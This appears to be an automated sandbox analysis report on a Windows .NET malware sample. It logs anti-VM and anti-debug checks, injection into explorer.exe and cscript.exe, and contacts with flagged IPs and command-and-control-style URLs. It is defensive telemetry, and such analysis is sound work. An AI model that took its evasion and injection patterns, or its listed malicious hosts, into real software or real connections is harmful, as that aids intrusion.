Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D9B5E second address: 00000000003D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 5048	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 4112	Thread sleep count: 138 > 30	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 1992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 6364	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4532	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4532	Thread sleep time: -102000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 3452	Thread sleep time: -110000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: explorer.exe, 00000002.00000002.713752043.0000000006300000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: bXFjrxjRlb.exe, 00000000.00000002.356031561.0000000000939000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	Binary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.183.162.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3440			Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: B8F008	Jump to behavior

Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.700359971.00000000008B8000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Users\user\Desktop\bXFjrxjRlb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
68.183.162.131	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	false

Name	IP	Active
thehostingroad.com	68.183.162.131	true
what3emoji.com	34.102.136.180	true
www.getyoursofa.com	162.241.30.16	true
parkingpage.namecheap.com	198.54.117.215	true
www.thehostingroad.com	unknown	unknown
www.akealuminum.com	unknown	unknown
www.what3emoji.com	unknown	unknown
www.inifinityapps.net	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV	true	Avira URL Cloud: safe	unknown
http://www.inifinityapps.net/bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV	true	Avira URL Cloud: safe	unknown

Analysis Report bXFjrxjRlb.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	344520
Product:	CloudBasic
Start time:	16:58:12
Start date:	26.01.2021
Sample:	bXFjrxjRlb.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4a595c5540f0a097a5f11159cdf5c015
SHA1:	9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
SHA256:	d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.log	ASCII text, with CRLF line terminators	CDA95282F22F47DA2FDDC9E912B67FEF	67A40582A092B5DF40C3EB61A361A2D336FC69E0	179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	F2A47587431C466535F3C3D3427724BE	90DF719241CE04828F0DD4D31D683F84790515FF	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B